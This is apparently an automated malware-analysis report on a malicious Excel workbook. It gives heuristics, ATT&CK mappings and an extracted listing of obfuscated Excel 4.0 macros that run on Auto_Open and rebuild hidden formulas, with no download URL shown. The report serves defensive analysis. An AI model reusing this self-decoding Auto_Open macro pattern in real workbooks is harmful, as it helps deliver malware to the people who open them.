MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known method for executing malicious code. The macro sheet contains a dangerous formula API call (RUN=0), suggesting it is designed to execute a payload. While no specific URLs or hashes were extracted, the presence of Auto_Open strongly implies a downloader or dropper functionality.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6709 bytes |
SHA-256: d17ec1a8dafe3e7a8beb2daf4ef845bad9956bd00a8a57c04548526a9d885b76 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - AXIhtoKvTgq
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C188
' 0018 27 LABEL : Cell Value, String Constant - FbTQxHHQykdl len=0
' 0018 22 LABEL : Cell Value, String Constant - fGDOYTo len=0
' 0018 26 LABEL : Cell Value, String Constant - fpzGzdldDAY len=0
' 0018 24 LABEL : Cell Value, String Constant - jhVpDdVzB len=0
' 0018 27 LABEL : Cell Value, String Constant - jLTygsDeNDrJ len=0
' 0018 24 LABEL : Cell Value, String Constant - KfpxRAXTE len=0
' 0018 22 LABEL : Cell Value, String Constant - lAEAAlA len=0
' 0018 24 LABEL : Cell Value, String Constant - lkdIwqHUH len=0
' 0018 23 LABEL : Cell Value, String Constant - MJAOEzpM len=0
' 0018 27 LABEL : Cell Value, String Constant - NntQmIcwQmxo len=0
' 0018 25 LABEL : Cell Value, String Constant - nPQdsUjNNs len=0
' 0018 25 LABEL : Cell Value, String Constant - nUlsfnhVaD len=0
' 0018 21 LABEL : Cell Value, String Constant - pPpklw len=0
' 0018 20 LABEL : Cell Value, String Constant - QAOVD len=0
' 0018 27 LABEL : Cell Value, String Constant - snLfpdblixPy len=0
' 0018 27 LABEL : Cell Value, String Constant - VgqToRBqHnwN len=0
' 0018 27 LABEL : Cell Value, String Constant - XmbZXnMrOFtm len=0
' 0018 21 LABEL : Cell Value, String Constant - YTCmUQ len=0
' 0018 22 LABEL : Cell Value, String Constant - ZAiQzjB len=0
' 0018 22 LABEL : Cell Value, String Constant - zgpYjqh len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' AXIhtoKvTgq,C96,"SET.NAME("FbTQxHHQykdl",VALUE("0"))",""
' AXIhtoKvTgq,C101,"SET.NAME("XmbZXnMrOFtm",FbTQxHHQykdl)",""
' AXIhtoKvTgq,C104,"SET.NAME("NntQmIcwQmxo",FbTQxHHQykdl)",""
' AXIhtoKvTgq,C106,"SET.NAME("YTCmUQ",COUNTA(jLTygsDeNDrJ))",""
' AXIhtoKvTgq,C110,"SET.NAME("nUlsfnhVaD",COUNTA(MJAOEzpM))",""
' AXIhtoKvTgq,C114,[],""
' AXIhtoKvTgq,C117,"SET.NAME("snLfpdblixPy","")",""
' AXIhtoKvTgq,C120,"XmbZXnMrOFtm",""
' AXIhtoKvTgq,C123,"SET.NAME("ZAiQzjB",HLOOKUP("*",jLTygsDeNDrJ,XmbZXnMrOFtm,FALSE))",""
' AXIhtoKvTgq,C126,"fpzGzdldDAY",""
' AXIhtoKvTgq,C128,"SET.NAME("pPpklw",FbTQxHHQykdl)",""
' AXIhtoKvTgq,C130,[],""
' AXIhtoKvTgq,C132,"pPpklw",""
' AXIhtoKvTgq,C136,"VgqToRBqHnwN",""
' AXIhtoKvTgq,C141,"lAEAAlA",""
' AXIhtoKvTgq,C145,"zgpYjqh",""
' AXIhtoKvTgq,C147,"SET.NAME("KfpxRAXTE",VALUE(HLOOKUP("*",MJAOEzpM,zgpYjqh,FALSE)))",""
' AXIhtoKvTgq,C152,"lkdIwqHUH",""
' AXIhtoKvTgq,C156,"snLfpdblixPy",""
' AXIhtoKvTgq,C159,"NntQmIcwQmxo",""
' AXIhtoKvTgq,C163,NEXT(),""
' AXIhtoKvTgq,C166,"jhVpDdVzB",""
' AXIhtoKvTgq,C169,"SET.NAME("f",INT(T(FORMULA(T(snLfpdblixPy)&"",""&T(jhVpDdVzB)))))",""
' AXIhtoKvTgq,C174,"nPQdsUjNNs",""
' AXIhtoKvTgq,C179,NEXT(),""
' AXIhtoKvTgq,C184,RETURN(),""
' AXIhtoKvTgq,C209,"SET.NAME("fGDOYTo",C96)",""
' AXIhtoKvTgq,C214,"jLTygsDeNDrJ",""
' AXIhtoKvTgq,C216,"SET.NAME("MJAOEzpM",R93C12)",""
' AXIhtoKvTgq,C219,"SET.NAME("nPQdsUjNNs",226)",""
' AXIhtoKvTgq,C223,"SET.NAME("QAOVD",3)",""
' AXIhtoKvTgq,C225,fGDOYTo(),""
' AXIhtoKvTgq,C226,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.